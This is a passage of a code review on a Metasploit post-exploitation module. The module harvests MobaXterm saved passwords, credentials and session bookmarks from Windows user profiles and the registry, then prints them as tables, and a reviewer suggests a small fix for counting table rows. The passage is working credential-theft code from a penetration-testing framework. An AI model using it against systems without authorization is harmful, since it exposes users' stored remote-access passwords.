modules/post/windows/gather/credentials/moba_xterm.rb

```diff
@@ -0,0 +1,330 @@
+        valuable_info['Credentials'] = config['Credentials'] || {}
+        valuable_info['Bookmarks'] = config['Bookmarks'] || nil
+        return valuable_info
+      end
+    else
+      print_warning('Could not find the config path for the MobaXterm. Ensure that MobaXterm is installed on the target.')
+      return false
+    end
+  end
+
+  def parse_bookmarks(bookmarks)
+    result = []
+    protocol_hash = { '#109#0' => 'ssh', '#98#1' => 'telnet', '#128#5' => 'vnc', '#140#7' => 'sftp', '#130#6' => 'ftp', '#100#2' => 'rsh', '#91#4' => 'rdp' }
+    bookmarks.each_key do |key|
+      next if key.eql?('ImgNum') || key.eql?('SubRep') || bookmarks[key].empty?
+
+      bookmarks_split = bookmarks[key].strip.split('%')
+      if protocol_hash.include?(bookmarks_split[0])
+        protocol = protocol_hash[bookmarks_split[0]]
+        server_host = bookmarks_split[1]
+        port = bookmarks_split[2]
+        username = bookmarks_split[3]
+        result << { name: key, protocol: protocol, server_host: server_host, port: port, username: username }
+      else
+        print_warning("Parsing is not supported: #{bookmarks[key].strip}")
+      end
+    end
+    return result
+  end
+
+  def run
+    print_status("Gathering MobaXterm session information from #{sysinfo['Computer']}")
+    session_p = 0
+    grab_user_profiles.each do |user|
+      next if user['AppData'].nil?
+
+      ini_config_path = "#{user['MyDocs']}\\MobaXterm\\MobaXterm.ini"
+      ini_config_path = datastore['CONFIG_PATH'] if datastore['CONFIG_PATH']
+      config = parser_ini(ini_config_path)
+      next if !config
+
+      parent_key = "HKEY_USERS\\#{user['SID']}\\Software\\Mobatek\\MobaXterm"
+      config['RegistryKey'] = parent_key
+      session_p = registry_getvaldata(parent_key, 'SessionP') if registry_key_exist?(parent_key)
+      pws_result = gather_password(config)
+      columns = [
+        'Protocol',
+        'Hostname',
+        'Username',
+        'Password',
+      ]
+      pw_tbl = Rex::Text::Table.new(
+        'Header' => 'MobaXterm Password',
+        'Columns' => columns
+      )
+      pws_result.each do |item|
+        pw_tbl << item.values
+      end
+      creds_result = gather_creds(config)
+      columns = [
+        'CredentialsName',
+        'Username',
+        'Password',
+      ]
+      creds_tbl = Rex::Text::Table.new(
+        'Header' => 'MobaXterm Credentials',
+        'Columns' => columns
+      )
+      creds_result.each do |item|
+        creds_tbl << item.values
+      end
+      bookmarks_result = parse_bookmarks(config['Bookmarks'])
+      columns = [
+        'BookmarksName',
+        'Protocol',
+        'ServerHost',
+        'Port',
+        'Credentials or Passwords',
+      ]
+      bookmarks_tbl = Rex::Text::Table.new(
+        'Header' => 'MobaXterm Bookmarks',
+        'Columns' => columns
+      )
+      bookmarks_result.each do |item|
+        bookmarks_tbl << item.values
+      end
+      if pw_tbl.count
```

Comment:
```suggestion
      if pw_tbl.rows.count
```
Was getting an error here when the password table was empty. `.rows.count` might be what you're looking